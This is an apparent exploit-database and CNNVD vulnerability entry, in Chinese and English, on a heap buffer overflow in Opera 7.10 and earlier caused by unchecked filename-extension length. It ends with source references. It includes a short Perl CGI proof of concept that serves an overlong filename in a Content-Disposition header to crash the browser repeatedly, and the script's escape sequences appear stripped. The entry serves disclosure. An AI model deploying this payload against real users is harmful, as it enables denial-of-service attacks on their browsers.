https://www.exploit-db.com/exploits/22550
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-195

Opera是一款多平台的WEB浏览器。Opera没有正确检查文件扩展名长度，远程攻击者可以利用这个漏洞构建恶意页面，诱使用户访问，可触发堆破坏，造成拒绝服务。Opera以宽字符编码方式把文件名写入到堆缓冲区中，在写入过程中，Opera没有检查扩展名长度，就写入数据到缓冲区边界上，可导致指针覆盖，和管理堆的结构破坏(被类似”XX00XX00″任意数据写入)，使Opera崩溃终止。根据作者分析此漏洞不能用于执行任意指令。

source: http://www.securityfocus.com/bid/7450/info

A vulnerability has been reported for Opera versions 7.10 and earlier. The problem is said to occur due to insufficient bounds checking on filename extensions. As a result, it may be possible for an attacker to corrupt heap-based memory.

Successful exploitation of this vulnerability may result in a denial of service, possibly prolonged. If a malicious filename entry were placed in a cache file, Opera may continuously crash until the cache file has been deleted.

#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.

$|=1;
my $filename = "." . "xCC" x (int(rand(0x20000)) + 0x100);

print "Content-type: text/htmlrn";
print qq~Content-Disposition: filename="$filename"rn~;
print "rn";
print "<html><body>Love & Peace :)</body></html>rn";

来源:BID
名称:7450
链接:http://www.securityfocus.com/bid/7450
来源:XF
名称:opera-file-extension-bo(11894)
链接:http://xforce.iss.net/xforce/xfdb/11894
来源:BUGTRAQ
名称:20030427[Opera7/6]LongFileExtensionHeapBufferOverrunVulnerabilityinDownload.
链接:http://archives.neohapsis.com/archives/bugtraq/2003-04/0346.html
来源：NSFOCUS
名称：4771
链接：http://www.nsfocus.net/vulndb/4771